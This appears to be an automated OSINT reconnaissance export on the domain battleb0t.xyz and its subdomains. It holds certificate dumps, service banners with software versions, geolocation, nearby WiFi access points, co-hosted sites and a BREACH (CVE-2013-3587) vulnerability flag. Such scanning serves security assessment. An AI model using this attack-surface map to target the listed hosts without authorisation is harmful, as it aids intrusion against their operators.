| 2023-05-12 02:51:31 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:57:f8:5f:6c:a4:d7:b1:d8:61:78:13:80:db:41:a4:54:3d
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 13:23:04 2022 GMT
Not After : Feb 15 13:23:03 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:d4:b5:dd:1d:03:00:c2:48:cc:5b:27:58:5a:1a:
ae:80:1c:0d:53:93:fb:69:7f:93:43:76:4d:e8:73:
1c:07:a2:3d:20:72:26:de:8b:cf:5e:08:ec:68:b1:
f5:77:47:34:1f:fc:12:0e:2f:4f:a4:d2:06:11:00:
78:b4:0d:40:fa:ba:21:05:d4:2d:c5:6d:14:14:39:
10:9a:e0:36:33:c9:8c:bb:e8:d5:33:a2:fb:d9:f7:
b5:1a:30:55:aa:67:e3:41:20:33:a1:e6:ed:c9:c3:
5b:50:61:0a:65:ba:c7:cc:f0:84:a3:6e:26:65:39:
57:a4:99:3b:03:5d:af:09:43:83:69:7f:84:65:08:
2e:12:10:15:1c:ad:1f:68:90:6a:0e:97:7d:ef:7a:
22:74:df:40:68:54:b2:c7:43:c9:cb:1c:9c:53:1d:
c4:68:a0:95:76:a1:bf:c8:18:fb:9d:30:f5:ff:26:
f8:35:1d:65:e6:a1:bc:6a:7f:70:ab:aa:3e:d6:87:
e6:17:39:3e:1e:ae:62:43:5c:02:c9:ab:c6:49:9a:
2c:43:3e:b0:0a:bb:6b:20:c9:45:43:a6:79:f2:70:
bf:69:eb:cb:fb:70:35:1a:f8:04:00:26:77:08:9e:
32:00:34:fd:0a:63:db:bc:61:0a:d9:52:e5:61:03:
a2:9b
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
FF:5A:2D:BE:67:DF:4E:45:A4:AD:A5:64:7A:31:7E:B3:39:8F:63:72
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Nov 17 14:23:04.766 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:D4:53:59:2F:EB:FF:FB:09:BA:76:BB:
E9:A4:81:C3:B1:93:13:10:22:54:A7:54:1C:46:19:3B:
6F:1B:01:CB:65:02:21:00:BB:AD:59:07:F2:64:D8:C4:
FA:7C:E2:49:2B:E4:9B:86:A7:0D:4A:BE:2B:43:0F:BA:
C2:73:EA:C3:69:47:E2:C3
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Nov 17 14:23:04.781 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:97:4D:DC:2F:D1:9B:1A:BE:09:EC:A2:
59:20:1E:95:7C:4B:C9:87:AC:96:9A:C3:4F:C0:0E:23:
4F:BC:16:AA:14:02:21:00:B1:07:3B:2C:0B:51:21:34:
74:50:BD:8C:B3:BE:A9:50:07:9B:F0:85:AB:3F:69:A1:
3D:6A:46:9D:88:A6:9A:89
Signature Algorithm: sha256WithRSAEncryption
ad:f7:33:43:81:f3:8d:21:44:85:e2:84:76:49:bc:87:f0:51:
96:b7:88:05:55:85:b8:e1:90:97:3e:c1:69:16:a8:c5:f1:39:
0d:d1:5f:8d:38:e4:0d:8b:e6:47:2a:f6:40:63:03:2b:f0:1f:
be:f8:b1:82:61:91:3b:03:b0:69:20:b4:dc:30:8c:89:f3:1c:
58:10:34:d9:81:b9:21:67:93:a8:46:92:4c:c7:e9:dc:76:7f:
5b:fc:b0:d2:dc:de:8d:94:c5:6b:c4:40:90:a8:e8:74:62:d2:
e6:1b:be:60:7f:96:01:c1:48:4a:c7:bd:8c:53:d2:a6:cf:88:
fa:4c:5d:6b:ed:42:b0:75:30:19:73:a0:d5:65:1d:45:1e:70:
23:da:e7:c5:31:6f:12:d3:54:2e:a3:91:e2:56:46:67:fd:10:
01:29:6e:69:67:d8:1f:99:c8:35:4f:2e:14:20:7c:c8:7b:86:
d6:ea:ed:96:56:81:0a:9f:3d:c7:d8:52:97:ea:0d:0a:ae:e6:
ce:93:f5:1e:0e:18:81:98:ef:d7:e3:a1:ab:63:09:30:4f:8f:
f5:0c:92:d0:84:ce:09:f8:71:10:dd:91:6b:72:67:70:ee:47:
d4:69:c2:95:9e:55:af:5a:cf:d9:19:cf:5f:f9:37:c3:6b:53:
ee:53:f7:4b
| battleb0t.xyz |
| 2023-05-12 03:24:47 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United States | Chantilly, Virginia, 20151, United States, North America |
| 2023-05-12 02:54:22 | Web Content Type | No | Web Spider | 0 | 0 | 3 | 0 | None | text/html | panel.battleb0t.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | myLGNet (Net ID: 00:02:A8:96:B6:F1) | 50.1188, 8.6843 |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | * OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE NAMESPACE LITERAL+ STARTTLS AUTH=PLAIN AUTH=LOGIN] Dovecot ready. | 87.248.157.102 |
| 2023-05-12 03:03:42 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | funny.battleb0t.xyz | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://funny.battleb0t.xyz', u'http_status': 301, u'plugins': {u'Country': {u'string': [u'UNITED STATES'], u'module': [u'US']}, u'HTTPServer': {u'string': [u'Netlify']}, u'RedirectLocation': {u'string': [u'https://funny.battleb0t.xyz/']}, u'UncommonHeaders': {u'string': [u'x-nf-request-id']}, u'IP': {u'string': [u'34.148.147.18']}}}, {}] |
| 2023-05-12 03:00:25 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | hmac-sha2-256-etm@openssh.com | {"operating_system": {"product": "Linux", "vendor": "Debian", "version": "10.2", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}, "last_updated_at": "2023-05-11T13:12:22.896Z", "ip": "64.226.81.43", "labels": ["remote-access"], "location_updated_at": "2023-05-04T23:08:56.702518Z", "autonomous_system_updated_at": "2023-05-04T23:08:56.702593Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kvydol.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-05T17:01:10.039852254Z"}, "kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-05-09T21:51:41.360251198Z"}, "wordpress-971118-3396556.cloudwaysapps.com": {"record_type": "A", "resolved_at": "2023-05-02T09:46:47.851165352Z"}}, "names": ["kvydol.easypanel.host", "kekw.battleb0t.xyz", "wordpress-971118-3396556.cloudwaysapps.com"], "reverse_dns": {"resolved_at": "2023-04-25T12:49:47.725442827Z", "names": ["971118.cloudwaysapps.com"]}}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:989054422845f7fb4a0f578fbb62a589973974ff9b7310e0eee11f9d1819efdb"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T11:58:34.839347829Z", "banner_hex": "5353482d322e302d4f70656e5353485f372e3970312044656269616e2d31302b64656231307532", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": 
"SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "0172e87daef36c52da4bd5592787fb64e976f73f4f61384a12164ac56f2ce5a1", "rsa_public_key": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 2048, "modulus": "uPxDpRdIrA/iz2ExEgRAxKmXST2zSxUUASzEIsL6O2PTrSNc6umFNFt/dHdxbK0YoU5gp4vR8iK16J/is3qdC1O0ZbGjQDlTCf7Ot9E/wR2JFzowSc1s9mpCkXPL2tjFtwBDcuHkmqou6ryP5VE5ak4jNCg57zigC0YIUbaIQBZ2jxMULPFDZH04Sm7BCi6dspyzcLPQj8OZRf2GyAISVhP0sEJYaziXVgNTRAQlqfYIDf9Nzlq1NseWj/r6MQ8+fir5bRq/WXlDIO3L0kx/XXBOQazwt1JhrESalbK3qpruuXFPUsHNFo5uT3KgeXHGYW3PgarxkIAvPDmJRHKYqQ==", "exponent": "AAEAAQ=="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ssh-rsa", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ssh-rsa"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256", "diffie-hellman-group14-sha1"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": 
["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Debian-10+deb10u2", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_7.9p1", "raw": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2"}, "hassh_fingerprint": "b12d2871a1189eff20364cf5333619ee"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Debian-10+deb10u2"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "7.9", "update": "p1", "source": "OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:7.9:p1:*:*:*:*:*:*", "other": {"family": "OpenSSH"}}, {"product": "Linux", "vendor": "Debian", "version": "10.2", "source": "OSI_APPLICATION_LAYER", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://64.226.81.43/"}, "response": {"body": "<!DOCTYPE html>\n<html>\n <iframe src=\"https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.html\" frameborder=\"0\" 
style=\"overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px\" height=\"100%\" width=\"100%\"></iframe>\n</html> ", "_encoding": {"body": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "protocol": "HTTP/1.1", "headers": {"_encoding": {"Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Vary": ["Accept-Encoding"], "Server": ["nginx"], "Connection": ["keep-alive"], "Etag": ["W/\"64217dc5-156\""], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]}, "body_hashes": ["sha256:d5e3078cb88ba53faa1d104c27054d2a8ff92665b4c02144f55489bf5c254016", "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf"], "status_code": 403, "body_hash": "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf", "body_size": 342, "status_reason": "Forbidden"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:888a2d848f3d16b40c32b4ff30abaadaacb398a98d5a44f4a0237b14ce63d529"], "source_ip": "167.248.133.36", "extended_service_name": "HTTP", "observed_at": "2023-05-11T05:48:53.194396164Z", "banner_hex": "485454502f312e312034303320466f7262696464656e0d0a5365727665723a206e67696e780d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a566172793a204163636570742d456e636f64696e670d0a455461673a20572f2236343231376463352d313536220d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_NTT", "banner": "HTTP/1.1 403 Forbidden\r\nServer: nginx\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nVary: Accept-Encoding\r\nETag: W/\"64217dc5-156\"\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "source": 
"OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:*:*:*:*:*:*:*:*", "other": {"family": "nginx"}}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676", "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b", "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"], "chain": [{"issuer_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "fingerprint": "7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "fingerprint": "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "fingerprint": "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"}], "leaf_data": {"pubkey_algorithm": "RSA", "public_key": {"key_algorithm": "RSA", "rsa": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 256, "modulus": "0TpnPayT/qE4F6J4qzOiK7JhnrAo9bFLNo2svrHA/v0LaIOAybJrnc5AyyYwgS6PTnc5WMsgwlVeIH5TInjmeEsEinXaSlGOrsV7Gm/ZW+7PMzYrK4KMP7g5Pv95Q5JU7FTQvxHAzRGxkvPDzcyogoNJIk1KXgVLPxdUyd+B1UFVrTMrqAkIf0M1HRzdWlOHv+OEsQ2QjcnXP0mIdDF6sbDns9klIt09P59g0zL++OZSIkvbIRKyvkKcmp+73HQRF0pjn2SY2RJKMExBzgIlPDKzcHLqDMPRl2zP8TcIdzRjF/X4rRYa64yxqmMYIDs4WPnhkpo7c5uTK7f4TFIU1Q==", 
"exponent": "AAEAAQ=="}, "fingerprint": "e577b60ecc733cd981273f877b2ab03d93986490630d699801165ebbec0a48cf"}, "subject_dn": "CN=*.cloudwaysapps.com", "pubkey_bit_size": 2048, "fingerprint": "46c14572bed6bb1c8797e7a0292d295e561d717b22535af514608f0d2fe40802", "issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "names": ["*.cloudwaysapps.com", "cloudwaysapps.com"], "tbs_fingerprint": "f9537ad843dfc5f6c9ec168dd4c17c3b |
| 2023-05-12 02:45:17 | Physical Location | No | ipapi.co | 0 | 0 | 4 | 0 | None | Toronto, Ontario, ON, Canada, CA | 2606:4700:3037::6815:470e |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | CableWiFi (Net ID: 00:0D:67:66:08:16) | 32.8608, -79.9746 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ISHLT-Corp (Net ID: 00:01:21:30:59:78) | 41.8781, -87.6298 |
| 2023-05-12 03:09:37 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 225.30.196.104.bc.googleusercontent.com | 104.196.30.225 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | logitec-99c005 (Net ID: 00:01:8E:99:C0:04) | 50.1188, 8.6843 |
| 2023-05-12 02:59:34 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-3587
https://nvd.nist.gov/vuln/detail/CVE-2013-3587
Score: 5.9
Description: The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. | kekw.battleb0t.xyz |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | ok.ru (Category: social)
https://ok.ru/login | login |
| 2023-05-12 03:01:32 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.71): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:01:40 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.177): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:03:25 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0000rgb124.github.io |
| 2023-05-12 03:25:09 | Internet Name | No | DNS Brute-forcer | 0 | 0 | 1 | 0 | None | www.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:09:34 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 210.30.196.104.bc.googleusercontent.com | 104.196.30.210 |
| 2023-05-12 02:53:45 | Physical Location | No | Censys | 0 | 0 | 2 | 0 | None | San Francisco, California, 94107, United States, North America | 2606:50c0:8002::153 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:EE:43:99) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:44:35 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Open Graph | fluid.battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:02:DD:85:3E:34) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:56:58 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:96:9b:29:e7:ba:1f:ed:f3:53:36:ca:2c:46:93:27:46:97
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 15:44:09 2022 GMT
Not After : Mar 13 15:44:08 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:c5:26:42:72:54:54:74:21:1e:c0:7a:66:54:5a:
e8:26:8a:a7:bb:78:e0:52:09:b4:70:cd:bc:21:4b:
2c:77:39:63:f4:67:8f:19:31:3e:f0:0f:58:55:9d:
80:0d:29:74:7f:66:1f:df:6c:0f:e4:7c:f2:b1:63:
d3:73:4b:d0:8e:1c:94:d5:39:9f:87:08:c9:39:28:
06:18:ff:8b:b4:c8:13:46:ac:cf:6d:a5:8c:43:a0:
09:d6:74:e4:1b:e6:a1:90:6d:22:b3:ba:58:9d:f7:
79:37:55:b1:58:ef:15:cb:64:d0:30:b0:3c:9c:57:
0f:fe:6c:6b:bb:3f:27:84:33:78:b0:19:92:bf:97:
a6:0f:20:d5:97:af:a6:3b:9d:2c:b6:18:1b:80:b6:
fb:2e:b9:e7:44:40:3a:ab:de:d1:27:94:5c:98:f3:
69:c6:eb:0a:ba:59:dd:58:0a:8d:f7:6b:71:2d:96:
80:0b:9a:05:20:72:48:c7:59:11:c0:d5:98:a3:64:
8a:78:35:12:8b:20:64:de:10:73:21:62:d5:82:94:
42:92:41:f0:40:98:0d:fd:64:08:ef:ba:99:48:1d:
ae:86:bd:de:46:1e:c7:72:49:3d:93:76:b8:e9:ff:
0d:e2:5c:31:61:a9:f2:59:1c:92:cb:56:9f:9b:f7:
48:28:35:ef:e1:4f:ae:4c:d6:6f:39:80:a0:50:ab:
78:66:96:ff:8d:78:93:50:2d:b7:0a:ef:fe:70:44:
cf:d9:e4:4f:5e:34:97:d6:93:af:d9:54:30:40:86:
24:9c:59:46:7c:df:86:e9:5e:eb:17:7f:95:e4:0e:
70:f5:5a:35:d4:64:cb:b9:5b:5c:bb:45:e6:4e:80:
a3:6d:83:42:86:a4:44:3b:83:c2:1d:e2:02:99:d0:
36:4c:c3:91:eb:69:38:a7:7d:2f:35:65:33:3e:23:
0b:5d:1b:0c:01:a1:10:75:e2:ac:bb:3b:bf:f6:2f:
ec:4e:98:ec:53:ee:86:34:4c:69:d1:38:5c:a9:07:
72:79:62:64:81:ea:03:fc:2f:18:db:04:b6:04:36:
1d:bc:01:56:0e:d9:49:1c:dd:41:11:ce:34:13:0f:
13:81:d8:cd:71:a3:fc:76:2b:ea:14:1c:8d:38:63:
54:f1:73:9f:26:18:47:68:79:40:b9:a0:ac:b7:d2:
e0:a8:36:94:6f:0c:c3:56:34:6a:ee:a7:97:c4:d3:
0b:44:a3:56:87:d8:dc:ce:f3:89:8c:09:62:1a:25:
1f:dd:5f:2a:c0:d4:a9:14:4f:34:09:bc:53:d5:35:
be:6b:0d:6a:49:bf:0b:11:66:23:11:60:25:c5:db:
56:15:5d
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:E8:B3:AA:B6:B4:6A:08:8C:66:4E:1B:FC:F4:D4:C0:C8:AD:D7:A5
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 13 16:44:09.315 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:EB:B2:4A:B8:57:10:D6:3B:2F:B5:2A:
89:BA:32:85:1C:16:28:E8:45:62:3E:AC:5F:C1:A7:01:
D5:8E:30:E3:17:02:20:27:39:6A:04:D2:61:CC:BD:8C:
4F:C5:13:6E:02:18:EB:24:BE:73:9E:F1:B4:F7:D8:89:
3A:CF:69:2B:AA:1C:75
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Dec 13 16:44:09.312 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:73:42:08:21:4C:2B:6E:54:89:A5:9F:6C:
27:A0:E3:7D:5D:89:06:32:EB:1E:21:D3:16:0C:E5:9D:
AB:38:FC:69:02:20:6E:F0:01:D9:C1:A2:AD:6E:65:26:
28:CF:30:5D:77:85:32:E7:53:E7:81:77:F5:0B:21:74:
83:B6:A0:E7:EA:52
Signature Algorithm: sha256WithRSAEncryption
32:8d:f0:fd:98:aa:6b:67:8b:fd:50:1f:a3:82:12:f7:96:0e:
20:1c:fd:bd:65:b3:76:ea:7d:e7:8e:de:49:56:5d:75:39:27:
85:12:91:b5:c9:aa:a8:98:14:b1:0b:89:0c:69:e2:0c:9e:47:
2e:8e:21:a5:d8:33:ba:43:8f:1a:0f:2c:6a:f9:b8:67:f2:5f:
5c:7a:06:bd:b7:ef:55:c1:6f:51:6b:fa:6b:09:ef:8b:fb:80:
49:8f:ee:cc:90:25:a6:9f:27:ae:ce:25:a8:cb:20:f2:07:c4:
43:8f:46:e1:64:24:94:30:c9:cf:5b:53:42:96:1a:a8:a3:26:
9e:e0:4f:a8:90:5b:82:db:4d:1c:ca:70:31:76:0c:bb:6c:d1:
c9:02:ca:92:68:04:3a:5e:ff:d1:9c:cc:9d:29:99:f7:9f:50:
63:8c:bd:09:15:13:aa:10:8a:fe:a4:7b:38:d1:de:50:78:a9:
f5:b9:42:b6:a4:a3:92:70:93:b5:82:12:31:84:1f:7a:4e:c1:
b5:6e:db:bb:40:e0:59:4d:30:89:d2:e6:e9:ce:d5:19:06:a3:
10:65:96:34:86:38:78:b2:8f:41:76:5c:48:0c:dd:1e:50:46:
64:18:01:03:0a:cf:fb:4b:6e:47:08:59:20:26:e3:b6:52:18:
5b:fb:b5:4a
|
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/ein_1.png | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00d2.github.io | 185.199.111.153 |
| 2023-05-12 02:46:04 | Physical Location | No | AbstractAPI | 0 | 0 | 3 | 0 | None | North Charleston, South Carolina, 29415, United States, North America | 34.74.170.74 |
| 2023-05-12 02:44:29 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
